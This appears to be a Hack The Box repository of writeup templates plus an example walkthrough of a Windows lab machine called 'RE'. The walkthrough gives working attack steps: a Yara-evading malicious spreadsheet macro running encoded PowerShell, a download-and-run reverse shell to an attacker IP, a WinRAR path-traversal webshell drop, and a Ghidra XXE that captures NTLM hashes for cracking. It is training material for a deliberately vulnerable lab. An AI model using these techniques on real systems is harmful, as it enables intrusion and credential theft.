├── Challenge-Writeup-Template.md
├── Machine-Writeup-Template.md
├── Sherlock-Questions-Template.yaml
├── Sherlock-Writeup-Template.md
├── assets
├── banner.png
└── htb.png
└── examples
├── RE.md
└── assets
├── 2QGRwYNeVUP2TVjOHoJMuOFYQJyD_bLSVLR4f1BXda2HEoWQ9U4UzWdV4CR-efGNFfp6kHqX-GEE2WVedur0m1vLopR8TumiWLxp3RUvAcWwctCgUDLRMr7zgam3UgblmMEmRk3Z
├── 59mV_D1wMNHeMe12uiQ4WwCEj0kFWNgsJbzdzp9t3WWC_0KBfA7ZLRSJLJBfIBrCY6A3KfZy6A6eV55zV3WWID8sIPB5_M8T1jRGsGAXvVIsevhSOWa61fbwmLEcVcvCK1LItHjk
├── 69oYGrKtb1edDNLpL0UYwSWJNPh3ch66589gEFYUEMT5z2scKC8SJYmWEUBh1aCdgDWu7hqro6m21TgghMDL_IBaK7d1_eZJDXIQItPyqQ5hEtArMhittwXjKm3Mu46vRKYt9gpd
├── 77jJ5nkrll3-YjxY8aF-1mjc_UhKAvGWpTMcOHlmdqOon8OTwUfbyXsXMhrlHd5_80OMBgud2y9voVk3TQbQVZpArvUg9UIel0sZBq5-jtse6FhzBhI5q8eBa_iYAhQwvPugCnWM
├── BNpg9rv3tUWhjtCzNKIgVfZsWd4TBKHhIK9EZt2I52QfRy0qHMMh4Un7K9GOOCMLMBpTFBEkrp3O1ekrKLvEtpkzLEPlaehBDkonO6KrYp_h-H-KuyaQtZxxH6xWPS4l8X-hZQBw
├── D8kTEA4qd5QdFm9puH8NGT8AObbNK-Q67RlYO0NBQHdI_CJBHwpzIwAnZVLKRn1Q71zUzG9nGu9vVRPfWdjTAja24VA1Dt3B_KE1p2bctYTB6j6_oQ2WDM3MAfTGhB2lGFj9MSPE
├── E7vMOH2tuJ0g3eS7RXKbvYtosao94Po9GpiWhkrzyFnudoXMX8vQhYhhPYJK2uukhgO5kwzOebgY8FsJ69dttGJQCiNpGWyZqVLtkiTfs-UuUvrMjWHbxbDy4-AN8seuz9vrJXkT
├── ENfAUKR64T5kDeVJscfYttyzL8-VcKVJgQwxztGQ2EoMmIBe947jLjoEF-WBXfi3k3fc1ym8OaSvSbCWnVPsfG79mP1-QH7eNlLKMRuEij8t808mOthkGzeA6TGwHnDlxssh-w28
├── Gb8gD1XOpiMVpiwArwTbXC1t4lTmwikAKOXc9d_4aZ_yQMI8dcjzWNTgUzyaf5ir1bi_mppWGdy-8Fd41ExQ0ZzbfR6BlZWNM5R5ZlM_UeS3PCxhJ8ho0LQS97c9E7TV96Y3KtPj
├── Hi5Bo0cg5w03KJvxcOxMqKEeekIkbnJPrjU5S_UHsucyzmMxOjOqSxXDRUeSYpot2NT_x1WCENroZTTbXzjKg6MNanKzPfzyJZLUHRXRNwOQ1qh7npFszQM-3EOHTFUxO_rg7-pT
├── HryxFnOoezafMB4WgXWX-RmNSzP1MZyfeCP4HtH71NCc5DMxx4gWQUsgX3LbPTSMqJguqiZqMPKi0MTQ4_UcfQy9wVrv3W5hwQ50NZqNOR18MDmJhIlyUoFaon28gyEYRxCmF1Q3
├── MdaNPIC2Rl8s33RI2awJ_r5gV9h-UW60sPrzGPEU4qo9PyXcJVB0iMI2fM_2w8PNPHU8Jrth8ZBuaeOpw2WEva2SEw6GOe_AouzZGLKyjVVR7MOFSQhZrLySobKYO8LooUJEORf-
├── Nsh5h_vvRdBW6MYqKOHt7IGZnB9BKCw_eXhAgt2F3sRHOG1TzMsZ7LJ7rBBUio_qyZTeAcKl72NCJ6oWBkqfRiYRVJm9Qum13nLluuztlddEvFObQW7ijwjBrRPBf6QbrzrLECjp
├── R_C_fC9O-fsf4V6TebHAsMw00j-5y_CAAN4SzwrwzNerEjk8-M6j3Fj5AVhsciK4t7axE67y5pheIr4NxvzT4vEMwuLjHKbmya9dNjrORD182NQjrUcHl6x7DwxEV8cV2Q0hppbb
├── RkurkUur1RMvqglkzfrR-LPBYFK3VqOnhA1rOrVIWk5umQG-yj6-LYH2PnzSDt9Hyh4wuormYn5vhsnP47635EQwxQ9snxhWaMy1L9IaxxUpWu34z_xxw0NVirhIKs-hS2vXLhQQ
├── SPFJDNXHJg6yJ8XRVy9fT0gpa-rzMgnNDrvHC9OC8RBokWm0pAGH0Py4geORPSAuzSawEtsumMp4IV5kSrMou36sBQq9owXLeBn9F6bHBxTFEKNiDj6n4__GC4mtgKftASOkgpHE
├── TApjv3d-ZxKyd0nxxn9k820M9IuFtdn2zvrdfOlZgJr2YYSavhoSmG9HGNiyWZDs3H2EHSP6HiWPEZPhk_NYuWanfK0FakNxJtVKrdk1EfEehvm3ZoEMKFCBXCuXiyhfQ7_LEC9E
├── Tj1aK2rAgkpu6Hc6QLpNOghDyhNXYe38BSl2NqA1T8fEqgw7HzrL2zCFDYxpjQo2IJBlIxYzkLXAm9ZOBl08cnT5Fc7_du_V9SBHfMhT65cEqdsiuRLuhqqNwkJPWzNuGka2kPFy
├── WmTDmkk7rMLLPdvxgkQqN_3FLnrBZjSIlCUS4m85lClvPSKdZl8U-OGgDA9RxidGiwJJC2QBgjyEorhgw99TMN6tGb4yEE-h8h2_yEMbP1OsHOHDA9DA0FNegGUaQ8sVtisEZJUz
├── YFA-YO9PwPMsj7To8aQpoVqIXyjk7BphOQjZETQLCRJG8S8yH04yo8oodWKC2CwGR2WeH4r3nyt2MmMf5IygVF03B7B-ulcNPmMqJALjBbVAg31x2gZuN72bLGrlB4IdpvgUYcWN
├── cozF1Q_x6YZuwD0tMRHRZC-JV0Ww-cHNRJN9Go45nCQ3ibBsbUD7vBk9SYf9muOKSFVjVlpB8Ry89634wNXz_mUv0CU5LUnfPLGSdOsqc_OmBvDeigzoMke6RN2vGlFoO8Zl-NrT
├── e1W8gcDTyz7PDroHzELgUXIQurtaAqrxTARF3m-rIfMUQv7ZdEHoVmkZ9mFQv7fneRnlcu233CB-IgEMGTCCFGZoE6Q2fsdO1XXTuUQaOywo91F5voLN_JbsrQkWfKoTObfmjObo
├── fEnF5GEHIXN5NBzlK2Jkliurgv_8zShJqFqkYowuVxuS5ntLWIe8jbq1M3o1UxWQBy06eiRqOBi0DIohBcYT549vd82n8s8YWIIhkjotW-0dhAmVi3wK0V0AuNk7YYTHljDTR05Y
├── jKKZuYjwuGySDmAR975SyjhW_hwFQ0uPmDeJTm7UbuAi3NI5xqmwMDUD6ftNkfidU3Xrp3caezF0-35FXB8qNFZwtjSovss1l3--PQfxdB7j_YdbdumZf6pidWF3QJAmqOGAQWuB
├── pOfJuvLlGDenodwz8aKLlPi6o9pjuaUBfw6vOWclFPYpBynF5OHMmXZ0RWFKCUM98Ol2oTGUmx5n4lSTMPqPq6gg5UeuPuCSiWgJZT0UDiozrvZ5MAcu8ptGMgP185np64cGhtEB
├── uU1YRXl-IE7Iq04p7CSHhZENwHJ_etsKNwFq_x7h7TZqQKWJ2D62IWtEUcV1FQjeDEb8XqTOXNVisDzv147O5EDHUn-M2GK4EEe9MuJEYkhjrFAYmJ-PhOdqgeqWBUBw7iDjLliw
└── vd7W7MMjZkw0jXj4ZxCMUpZteMrF3VKZNZUP01SwLJBfXHabyUZx7wdnFkSeUPM3CkaHg8Vzuu2Co1Xt2-tz6SWjoLec0N9rj_kGxe7V5ufaI44ZAVh8qkHfWHipuNTnUsQCBr48
/Challenge-Writeup-Template.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | 
4 |
5 | 1st August 2023
6 |
7 | Prepared By: ``
8 |
9 | Challenge Author(s): ``
10 |
11 | Difficulty: Medium
12 |
13 |
14 |
15 | ***NOTE : The headings with `(!)` should be necessarily included in your writeup while the ones with `(*)` are optional and should be included only if there is a need to. Of course, you can modify the content of each section accordingly. We just provide some boilerplate text.***
16 |
17 | # Synopsis (!)
18 |
19 | - Briefly explain what the user must do to solve this challenge.
20 |
21 | ## Description (!)
22 |
23 | - ...
24 |
25 | ## Skills Required (!)
26 |
27 | - Python
28 | - Researching Skills
29 | - C/C++
30 | - Know how to use common RE tools (i.e. Ghidra, IDA)
31 | - ...
32 |
33 | ## Skills Learned (!)
34 |
35 | - Learn how SQLi works.
36 | - Learn how to unpack executables.
37 | - Learn how to solve linear systems of equations.
38 | - ...
39 |
40 | # Enumeration (!)
41 |
42 | ## Analyzing the source code (*)
43 |
44 | - Explain what source files you are provided with when you unzip the challenge zip file.
45 |
46 | Analyze the source files as much as you can so it is clear what the challenge is about.
47 |
48 | ...
49 |
50 | If we look at `source.py`, we can see that our goal is:
51 |
52 | - Specify the goal of the challenge (i.e. where the flag is and how it can be accessed)
53 | - ...
54 |
55 | The basic workflow of the script is as follows:
56 |
57 | 1. Method `test()` is called which then calls `test1()`
58 | 2. `test1()` creates an object of the `XXX` class which initializes `YYY`.
59 | 3. ...
60 |
61 | A little summary of all the interesting things we have found out so far:
62 |
63 | 1. The PHP query handler does not use prepared statements.
64 | 2. The RSA modulo is generated with a non-standard way.
65 | 3. ...
66 |
67 | # Solution (!)
68 |
69 | ## Finding the vulnerability (*)
70 |
71 | Explain where the vulnerability is. Be as detailed as possible so there are no logical gaps as to how you figured out the vulnerability and how you will proceed to the solution.
72 |
73 | ## Exploitation (!)
74 |
75 | ### Connecting to the server (*)
76 |
77 | Here is some boilerplate code for connecting to a docker-based challenge:
78 |
79 | ```python
80 | if __name__ == "__main__":
81 | r = remote("0.0.0.0", 1337)
82 | pwn()
83 | ```
84 |
85 | Let us consider our attack scenario.
86 |
87 | 1. ...
88 | 2. ...
89 | 3. ...
90 |
91 | The attack explained above can be implemented with the following code:
92 |
93 | ```python
94 | def important_function_that_does_something(param1, param2):
95 |
96 | ```
97 |
98 | ### Getting the flag (!)
99 |
100 | A final summary of all that was said above:
101 |
102 | 1.
103 | 2.
104 |
105 | This recap can be represented by code using `pwn()` function:
106 |
107 | ```python
108 | def pwn():
109 | pass
110 | ```
111 |
112 | Avoid writing any function body here. Make sure you have written them under `Exploitation` or `Finding the vulnerability` sections.
--------------------------------------------------------------------------------
/Machine-Writeup-Template.md:
--------------------------------------------------------------------------------
1 | # [Machine Name]
2 |
3 | ## Introduction
4 |
5 | [Include why you made this box, what skills and vulnerabilities you wanted to highlight, etc]
6 |
7 | ## Info for HTB
8 |
9 | ### Access
10 |
11 | Passwords:
12 |
13 | | User | Password |
14 | | ----- | ----------------------------------- |
15 | | user1 | [pass phrase, not too hard to type] |
16 | | user2 | [pass phrase, not too hard to type] |
17 | | root | [pass phrase, not too hard to type] |
18 |
19 | ### Key Processes
20 |
21 | [Describe processes that are running to provide basic services on the box, such as web server, FTP, etc. **For any custom binaries, include the source code (in a separate file unless very short)**. Also, include if any of the services or programs are running intentionally vulnerable versions.]
22 |
23 | ### Automation / Crons
24 |
25 | [Describe any automation on the box:
26 |
27 | - What does it do?
28 | - Why? (necessary for exploit step, clean up, etc)
29 | - How does it do it? Provide source code (anything longer than a few lines in a separate attachment)
30 | - How does it run?
31 |
32 | ]
33 |
34 | ### Firewall Rules
35 |
36 | [Describe any non-default firewall rules here]
37 |
38 | ### Docker
39 |
40 | [Describe how docker is used if at all. Attach Dockerfiles]
41 |
42 | ### Other
43 |
44 | [Include any other design decisions you made that the HTB staff should know about]
45 |
46 |
47 |
48 | # Writeup
49 |
50 | [
51 |
52 | Provide an in-depth explanation of the steps it takes to complete the box from start to finish. Divide your walkthrough into the below sections and sub-sections and include images to guide the user through the exploitation.
53 |
54 | Please also include screenshots of any visual elements (like websites) that are part of the submission. Our review team is not only evaluating the technical path, but the realism and story of the box.
55 |
56 | Show **all** specific commands using markdown's triple-backticks (```` ```bash ````) such that the reader can copy/paste them, and also show the commands' output through images or markdown code blocks (```` ``` ````).
57 |
58 | **A reader should be able to solve the box entirely by copying and pasting the commands you provide.**
59 |
60 | ]
61 |
62 | # Enumeration
63 |
64 | [Describe the steps that describe the box's enumeration. Typically, this includes a sub-heading for the Nmap scan, HTTP/web enumeration, etc.]
65 |
66 | # Foothold
67 |
68 | [Describe the steps for obtaining an initial foothold (shell/command execution) on the target.]
69 |
70 | # Lateral Movement (optional)
71 |
72 | [Describe the steps for lateral movement. This can include Docker breakouts / escape-to-host, etc.]
73 |
74 | # Privilege Escalation
75 |
76 | [Describe the steps to obtaining root/administrator privileges on the box.]
77 |
--------------------------------------------------------------------------------
/Sherlock-Questions-Template.yaml:
--------------------------------------------------------------------------------
1 | scenario: >
2 | PLACEHOLDER TEXT
3 | description: >
4 | DESCRIPTION
5 | questions:
6 | - number: 1
7 | type: free
8 | title: question text
9 | flag: answer
10 | answer_case_sensitive: false
11 | placeholder: formatting stuff in answer box
12 | requires: null
13 | - number: 2
14 | type: free
15 | title: question text
16 | flag: answer
17 | answer_case_sensitive: false
18 | placeholder: formatting stuff in answer box
19 | requires: null
20 | - number: 3
21 | type: free
22 | title: question text
23 | flag: answer
24 | answer_case_sensitive: false
25 | placeholder: formatting stuff in answer box
26 | requires: null
27 | - number: 4
28 | type: free
29 | title: question text
30 | flag: answer
31 | answer_case_sensitive: false
32 | placeholder: formatting stuff in answer box
33 | requires: null
34 | - number: 5
35 | type: free
36 | title: question text
37 | flag: answer
38 | answer_case_sensitive: false
39 | placeholder: formatting stuff in answer box
40 | requires: null
41 | - number: 6
42 | type: free
43 | title: question text
44 | flag: answer
45 | answer_case_sensitive: false
46 | placeholder: formatting stuff in answer box
47 | requires: null
48 | - number: 7
49 | type: free
50 | title: question text
51 | flag: answer
52 | answer_case_sensitive: false
53 | placeholder: formatting stuff in answer box
54 | requires: null
55 | - number: 8
56 | type: free
57 | title: question text
58 | flag: answer
59 | answer_case_sensitive: false
60 | placeholder: formatting stuff in answer box
61 | requires: null
62 | - number: 9
63 | type: free
64 | title: question text
65 | flag: answer
66 | answer_case_sensitive: false
67 | placeholder: formatting stuff in answer box
68 | requires: null
69 | - number: 10
70 | type: free
71 | title: question text
72 | flag: answer
73 | answer_case_sensitive: false
74 | placeholder: formatting stuff in answer box
75 | requires: null
76 | - number: 11
77 | type: free
78 | title: question text
79 | flag: answer
80 | answer_case_sensitive: false
81 | placeholder: formatting stuff in answer box
82 | requires: null
83 | - number: 12
84 | type: free
85 | title: question text
86 | flag: answer
87 | answer_case_sensitive: false
88 | placeholder: formatting stuff in answer box
89 | requires: null
90 | - number: 13
91 | type: free
92 | title: question text
93 | flag: answer
94 | answer_case_sensitive: false
95 | placeholder: formatting stuff in answer box
96 | requires: null
97 | - number: 14
98 | type: free
99 | title: question text
100 | flag: answer
101 | answer_case_sensitive: false
102 | placeholder: formatting stuff in answer box
103 | requires: null
104 | - number: 15
105 | type: free
106 | title: question text
107 | flag: answer
108 | answer_case_sensitive: false
109 | placeholder: formatting stuff in answer box
110 | requires: null
111 | - number: 16
112 | type: free
113 | title: question text
114 | flag: answer
115 | answer_case_sensitive: false
116 | placeholder: formatting stuff in answer box
117 | requires: null
118 | - number: 17
119 | type: free
120 | title: question text
121 | flag: answer
122 | answer_case_sensitive: false
123 | placeholder: formatting stuff in answer box
124 | requires: null
125 | - number: 18
126 | type: free
127 | title: question text
128 | flag: answer
129 | answer_case_sensitive: false
130 | placeholder: formatting stuff in answer box
131 | requires: null
132 | - number: 19
133 | type: free
134 | title: question text
135 | flag: answer
136 | answer_case_sensitive: false
137 | placeholder: formatting stuff in answer box
138 | requires: null
139 | - number: 20
140 | type: free
141 | title: question text
142 | flag: answer
143 | answer_case_sensitive: false
144 | placeholder: formatting stuff in answer box
145 | requires: null
146 |
--------------------------------------------------------------------------------
/Sherlock-Writeup-Template.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | # Template Writeup
4 | 25th January 2023
5 |
6 | Prepared by: handlehere
7 |
8 | Machine Author(s): handlehere
9 |
10 | Difficulty:Easy /Medium/Hard/Insane
11 |
12 | ## Scenario
13 | ```
14 | Enter the scenario here
15 | ```
16 | ## Artifacts Provided
17 |
18 | Enter the artifacts provided along with their file hash here.
19 |
20 | - ExampleFile1 - *FileHash*
21 | - ExampleFIle2 - *FileHash*
22 |
23 | ## Initial Analysis
24 |
25 | Enter the initial analysis you perform when retrieving the artifacts, for example when retrieving a memory dump from an asset you may want to check the file hash and run imageinfo to confirm details about the host it was retrieved from, when it was retrieved... etc.
26 |
27 | ### Analysis Sub-Section
28 |
29 | Analysis for a certain key area such as network traffic or disk forensics.
30 |
31 | ## Questions
32 |
33 | *Feel free to include the questions in the yaml format as well*
34 |
35 | 1. Question 1 example
36 | `Answer in code block`
37 | 2. Question 2 example
38 | `Answer in code block`
39 |
40 | Analysis of artifacts to find answer to question 1 and then detail the answer.
41 |
--------------------------------------------------------------------------------
/assets/banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackthebox/public-templates/d31db82d60f5922bd24b6a4ec40251a6978ce0dc/assets/banner.png
--------------------------------------------------------------------------------
/assets/htb.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackthebox/public-templates/d31db82d60f5922bd24b6a4ec40251a6978ce0dc/assets/htb.png
--------------------------------------------------------------------------------
/examples/RE.md:
--------------------------------------------------------------------------------
1 | # RE
2 |
3 | ## Introduction
4 |
5 | This box is designed to get players hacking the machine of a malware reverse engineer. The three intended exploits are uploading a malicious ODS document that evades yara checks, exploiting a zipslip vulnerability in WinRar, and exploiting an XXE vulnerability in Ghidra. I'm a huge fan of phishing documents, and wanted to challenge players to design that own, and I used Yara to filter out ones built by common frameworks like Metasploit, which is something a SOC I worked in used to do. The WinRar zipslip is a common vulnerability being used by Ransomeware currently. And I thought the Ghidra bug was neat, as it's a tool I use for HTB and other CTF challenges, and I wanted to find a way to make it exploitable.
6 |
7 | ## Info for HTB
8 |
9 | ### Access
10 |
11 | Passwords:
12 |
13 | | User | Password |
14 | | ------------- | -------------------------------- |
15 | | luke | 2017championship! |
16 | | cam | 195719821993200520092017 |
17 | | coby | championship2005 |
18 | | administrator | 1B4FB905423F4AD8D99C731468F7715D |
19 |
20 | ### Key Processes
21 |
22 | IIS is hosting three webservers:
23 |
24 | - default contains link to reblog.htb
25 | - re.htb - check for updates page with comments giving hints to Ghidra exploitation
26 | - reblog.htb - static jekyll-generated blog site
27 |
28 | SMB has a world writable share, `malware_dropbox`.
29 |
30 | The [Ghidra](https://ghidra-sre.org/) re tool is installed and run via cron by the coby user. The version is vulnerable to an XXE vulnerability, and should not be updated.
31 |
32 | ### Automation / Crons
33 |
34 | To start box, turn on, and make sure three scheduled tasks are running, one for each user. They should start on boot.
35 |
36 | There are three scheduled tasks running on the box that should start on boot, one for each user.
37 |
38 | The scheduled task named `Check osd` runs a PowerShell script as luke looking for files dropped in the SMB share, and will unzip them and run yara rules against them to look for certain keywords (ensure the player has done some obfuscation), removing any that match. Then it will open them in soffice so that the macros will run. Finally, it archives the samples to another folder as a rar archive. PowerShell script will start on boot running as luke and runs in a continuous loop so that it's constantly checking files (with some sleeps). The samples are meant to contain macros that will be exploited to gain a shell as luke. `process_samples.ps` and `ods.yara` both sit in `C:\Users\luke\Documents\`, and copies are attached with this writeup.
39 |
40 | The scheduled task named `unzip achive` runs a PowerShell script as cam that looks for rar archives and moves them in such a way that rar-slip can be exploited allowing for the player to upload a webshell. The script is running on an infinate loop with sleeps, located at `C:\Users\cam\Documents\process_rars.ps1`, and a copy is attached. There is no intention that the user ever be able to get execution as cam.
41 |
42 | The scheduled task named `process projects` runs a PowerShell script as coby that looks for zip files in the `C:\proj_drop` directory. It does some editing of Ghidra config / state files so that that project is the current project, and then opens Ghidra and sleeps for 50 seconds, long enough for the XXE bug in Ghidra to be exploited. It then kills the process and continues. The script is located at `C:\Users\coby\documents\process_projects.ps1`, and a copy is attached.
43 |
44 | ### Firewall Rules
45 |
46 | The firewall is blocking 5985 so that players will have to port forward to use Winrm.
47 |
48 | ### Docker
49 |
50 | N/A
51 |
52 | ### Other
53 |
54 | The scripts and flags are encrypted with EFS. However, because of the Scheduled Tasks, CredSSP is not necessary to read the files. It does prevent SYSTEM from reading files, which is a hedge against a new Potato or unknown exploit.
55 |
56 | # Writeup
57 |
58 | ## Enumeration
59 |
60 | ### Nmap
61 |
62 | ```
63 | ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.144 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
64 | nmap -p$ports -sC -sV 10.10.10.144
65 | ```
66 |
67 | 
68 |
69 | We find IIS and SMB running on their usual ports.
70 |
71 | ### IIS
72 |
73 | Browsing to port 80 redirects us to reblog.htb.
74 |
75 | 
76 |
77 | Add reblog.htb to the hosts file and browse to it. We come across a website with various blog posts.
78 |
79 | 
80 |
81 | According to the post above, users are supposed to drop any kind of ods (Openoffice spreadsheet) documents into the malware dropbox. Another post states that they are using Yara to analyze the documents, which directs us to this [post](https://0xdf.gitlab.io/2019/03/27/analyzing-document-macros-with-yara.html).
82 |
83 | 
84 |
85 | We should keep these rules in mind while creating a malicious document, as it’s likely that the box uses this.
86 |
87 | ### SMB
88 |
89 | Let’s check SMB to see if there are any open shares, which can be enumerated using smbclient.
90 |
91 | 
92 |
93 | The -N flag is used to connect without credentials. We can see a “malware_dropbox” share, which must be the dropbox that post was talking about.
94 |
95 | ## Foothold
96 |
97 | ### Creating Malicious ODS Document
98 |
99 | Now that we have access to the dropbox, we can try creating a malicious document which executes a macro on opening. According to the blog post, the dropbox detects macros created with metasploit, and any that execute powershell.exe or cmd.exe directly. In order to evade detection, base64 encoded commands can be used. The “enc” parameter in PowerShell can be used to execute commands encoded as base64 strings. Let’s try pinging ourselves using the macro.
100 |
101 | 
102 |
103 | The command is first encoded as a UTF-16 string (the default Windows encoding), followed by base64 encoding. The final command looks like:
104 |
105 | ```
106 | cmd /c powershell -enc cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==
107 | ```
108 |
109 | As Yara does static analysis of the document, we can split the command up into multiple strings, and then execute it after concatenation. Launch OpenOffice or LibreOffice Calc, go to Tools > Macros > Organize Macros > LibreOffice Basic, expand Untitled1 and select “Standard”. Click on “New” to create a new macro.
110 |
111 | 
112 |
113 | Name it anything and click on Ok. Enter the following code under Module1 after the editor opens.
114 |
115 | ```
116 | Sub Main
117 | exec1 = "cm"
118 | exec2 = "d /c powers"
119 | exec3 = "hell -enc cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA=="
120 | exec = exec1 + exec2 + exec3
121 | Shell(cmd)
122 | End Sub
123 | ```
124 |
125 | We’ve split up the command into three strings and concatenate them before execution using the Shell() function.Next, save the document and close the editor. We need to make sure that the macro is run as soon as the document is opened. To do that, go to Tools > Customize and click on the Events tab, then select “Open Document” and click on “Macro” to assign it a macro. Now expand the document tree and select the Macro name on the right.
126 |
127 | 
128 |
129 | Clicking on Ok should assign our macro to the “Open Document” event.
130 |
131 | 
132 |
133 | ### Upload ping POC
134 |
135 | Save the document, start an ICMP listener and upload the document to the dropbox.
136 |
137 | 
138 |
139 | 
140 |
141 | ### Shell
142 |
143 | We received ICMP requests on our listener, which confirms code execution. Let’s try downloading and executing a TCP reverse shell which can be found [here](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1).
144 |
145 | 
146 |
147 | Add the following line to the end of tcp.ps1:
148 |
149 | ```
150 | Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 4444
151 | ```
152 |
153 | Swap the base64 encoded payload in the existing macro with the one created above and ensure an HTTP server is running in the folder.
154 |
155 | 
156 |
157 | A shell as the user luke should be received after uploading the document. Here we can get user.txt.
158 |
159 | ## Lateral Movement
160 |
161 | Looking at the IIS root folder, we find three sub-folders which we don’t have access to.
162 |
163 | 
164 |
165 | We’ve already inspected the IP and the blog vhost. However, there seems to be another vhost named “re”. Let’s add re.htb to the hosts file and browse to it.
166 |
167 | 
168 |
169 | The page displays the message above, but examination of the source code reveals the following:
170 |
171 | ```html
172 |
205 | ```
206 |
207 | According to this, the site will let users upload Ghidra projects in the form of ZIP archives. Let’s put this aside for now and keep enumerating. Browsing to the user’s documents folder, a powershell script is seen. The script processes uploaded ods files and executes them. We see the following lines at the end of the script.
208 |
209 | ```
210 | #& 'C:\Program Files (x86)\WinRAR\Rar.exe' a -ep $process_dir\temp.rar $process_dir\*.ods 2>&1 | Out-Null
211 |
212 | Compress-Archive -Path "$process_dir\*.ods" -DestinationPath "$process_dir\temp.zip"
213 |
214 | $hash = (Get-FileHash -Algorithm MD5 $process_dir\temp.zip).hash
215 | # Upstream processing may expect rars. Rename to .rar
216 | Move-Item -Force -Path $process_dir\temp.zip -Destination $files_to_analyze\$hash.rar
217 | ```
218 |
219 | It compresses the uploaded documents into a ZIP archive, and then moves them into the “C:\Users\luke\Documents\ods” folder with a “rar” extension for future processing. Winrar versions prior to 5.6.1 suffer from an arbitrary write vulnerability via path traversal, in the context of the user opening the archive. The [Evil-Winrar-Gen](https://github.com/manulqwerty/Evil-WinRAR-Gen) program can be used to craft a malicious archive. Let’s try writing [this](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx) webshell to the writable uploads folder in the re.htb vhost.
220 |
221 | 
222 |
223 | A file named “shell.rar” should be generated after following the above steps. The -e parameter is used to specify the file to be extracted (to the path specified by -p), while the -g parameter can be any file. Next, transfer the file to the ods folder.
224 |
225 | 
226 |
227 | The webshell should be found at /cmd.aspx after the file gets processed.
228 |
229 | 
230 |
231 | Let’s execute the tcp.ps1 script once again to get a shell as the IIS user.
232 |
233 | 
234 |
235 | 
236 |
237 | ## Privilege Escalation
238 |
239 | The IIS user has access to the proj_drop folder used to store uploaded Ghidra projects.
240 |
241 | 
242 |
243 | Ghidra is vulnerable to [XXE](https://github.com/NationalSecurityAgency/ghidra/issues/71) due to improper handling of the XML files present in a project. We can exploit this to steal the NetNTLMv2 hash of the user who opens it. Ghidra can be downloaded from its official website [here](https://ghidra-sre.org/). Extract the contents of the downloaded zip file, and execute the **ghidraRun** binary to start Ghidra. Next, click on File > Project > New Project, enter any name and click Finish.
244 |
245 | 
246 |
247 | The folder structure should look like the image above. Now, the project.prp file can be edited to include the XXE payload.
248 |
249 | ```xml
250 |
251 |
253 | %xxe;
254 | ]>
255 |
256 |
257 |
258 |
259 |
260 | ```
261 |
262 | Upon opening the file, Ghidra will send a request to our machine, and our listening responder will capture the user’s NetNTLMv2 hash. Start Responder, archive the entire directory and transfer it to the proj_drop folder.
263 |
264 | 
265 |
266 | The hash for the user Coby should shortly be received. Copy it to a file.
267 |
268 | 
269 |
270 | It can be cracked using John The Ripper or Hashcat and the rockyou.txt wordlist.
271 |
272 | 
273 |
274 | The hash is cracked and the password is revealed to be “championship2005”, which can be used to login as the Coby. The user Coby is in the “Administrators” and “Remote Management Users” group, so we can use WinRM to execute commands as him. Let’s use Invoke-Command to execute a reverse shell.
275 |
276 | 
277 |
278 | Executing the commands above should give us a reverse shell as Coby, after which the final flag can be accessed.
279 |
280 | 
--------------------------------------------------------------------------------
/examples/assets/2QGRwYNeVUP2TVjOHoJMuOFYQJyD_bLSVLR4f1BXda2HEoWQ9U4UzWdV4CR-efGNFfp6kHqX-GEE2WVedur0m1vLopR8TumiWLxp3RUvAcWwctCgUDLRMr7zgam3UgblmMEmRk3Z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackthebox/public-templates/d31db82d60f5922bd24b6a4ec40251a6978ce0dc/examples/assets/2QGRwYNeVUP2TVjOHoJMuOFYQJyD_bLSVLR4f1BXda2HEoWQ9U4UzWdV4CR-efGNFfp6kHqX-GEE2WVedur0m1vLopR8TumiWLxp3RUvAcWwctCgUDLRMr7zgam3UgblmMEmRk3Z
--------------------------------------------------------------------------------
/examples/assets/59mV_D1wMNHeMe12uiQ4WwCEj0kFWNgsJbzdzp9t3WWC_0KBfA7ZLRSJLJBfIBrCY6A3KfZy6A6eV55zV3WWID8sIPB5_M8T1jRGsGAXvVIsevhSOWa61fbwmLEcVcvCK1LItHjk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackthebox/public-templates/d31db82d60f5922bd24b6a4ec40251a6978ce0dc/examples/assets/59mV_D1wMNHeMe12uiQ4WwCEj0kFWNgsJbzdzp9t3WWC_0KBfA7ZLRSJLJBfIBrCY6A3KfZy6A6eV55zV3WWID8sIPB5_M8T1jRGsGAXvVIsevhSOWa61fbwmLEcVcvCK1LItHjk
--------------------------------------------------------------------------------
/examples/assets/69oYGrKtb1edDNLpL0UYwSWJNPh3ch66589gEFYUEMT5z2scKC8SJYmWEUBh1aCdgDWu7hqro6m21TgghMDL_IBaK7d1_eZJDXIQItPyqQ5hEtArMhittwXjKm3Mu46vRKYt9gpd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackthebox/public-templates/d31db82d60f5922bd24b6a4ec40251a6978ce0dc/examples/assets/69oYGrKtb1edDNLpL0UYwSWJNPh3ch66589gEFYUEMT5z2scKC8SJYmWEUBh1aCdgDWu7hqro6m21TgghMDL_IBaK7d1_eZJDXIQItPyqQ5hEtArMhittwXjKm3Mu46vRKYt9gpd
--------------------------------------------------------------------------------
/examples/assets/77jJ5nkrll3-YjxY8aF-1mjc_UhKAvGWpTMcOHlmdqOon8OTwUfbyXsXMhrlHd5_80OMBgud2y9voVk3TQbQVZpArvUg9UIel0sZBq5-jtse6FhzBhI5q8eBa_iYAhQwvPugCnWM:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackthebox/public-templates/d31db82d60f5922bd24b6a4ec40251a6978ce0dc/examples/assets/77jJ5nkrll3-YjxY8aF-1mjc_UhKAvGWpTMcOHlmdqOon8OTwUfbyXsXMhrlHd5_80OMBgud2y9voVk3TQbQVZpArvUg9UIel0sZBq5-jtse6FhzBhI5q8eBa_iYAhQwvPugCnWM
--------------------------------------------------------------------------------
